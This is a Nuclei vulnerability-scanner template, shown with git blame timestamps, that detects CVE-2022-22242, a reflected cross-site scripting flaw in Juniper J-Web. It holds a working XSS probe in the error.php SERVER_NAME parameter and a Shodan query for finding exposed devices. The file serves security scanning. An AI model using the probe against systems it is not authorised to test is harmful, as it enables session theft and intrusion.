nuclei-templates/http/cves/2022/CVE-2022-22242.yaml

57 lines
2.8 KiB
YAML
Raw Normal View History

2022-11-01 23:45:53 +00:00
id: CVE-2022-22242
2022-10-28 14:58:55 +00:00
info:
2022-10-28 15:37:02 +00:00
name: Juniper Web Device Manager - Cross-Site Scripting
2022-10-28 14:58:55 +00:00
author: EvergreenCartoons
2022-11-03 04:03:25 +00:00
severity: medium
description: |
Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.
2022-10-28 14:58:55 +00:00
reference:
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
2022-11-03 04:03:25 +00:00
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
- https://kb.juniper.net/JSA69899
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
epss-score: 0.04391
epss-percentile: 0.91557
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
2022-10-28 15:37:47 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: juniper
product: junos
2023-09-06 11:59:08 +00:00
shodan-query: title:"Juniper Web Device Manager"
2024-01-14 09:21:50 +00:00
tags: cve2022,cve,xss,juniper,junos
2022-10-28 14:58:55 +00:00
http:
2022-10-28 14:58:55 +00:00
- method: GET
path:
2022-10-28 15:37:02 +00:00
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
2022-10-28 14:58:55 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-10-28 15:37:02 +00:00
words:
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition: and
2022-10-28 14:58:55 +00:00
- type: word
2022-10-28 15:39:06 +00:00
part: header
2022-10-28 14:58:55 +00:00
words:
- "text/html"
2022-10-28 15:37:02 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100e32c27f2a3c735802746b97d0c241c0c4933012cd1bd5fcc919c580c63b77bd702210097d68e7741bdaee65c2f00b10bcd4b676110d9c58dbdff1d94587031ab0d916b:922c64590222798bb761d5b6d8e72950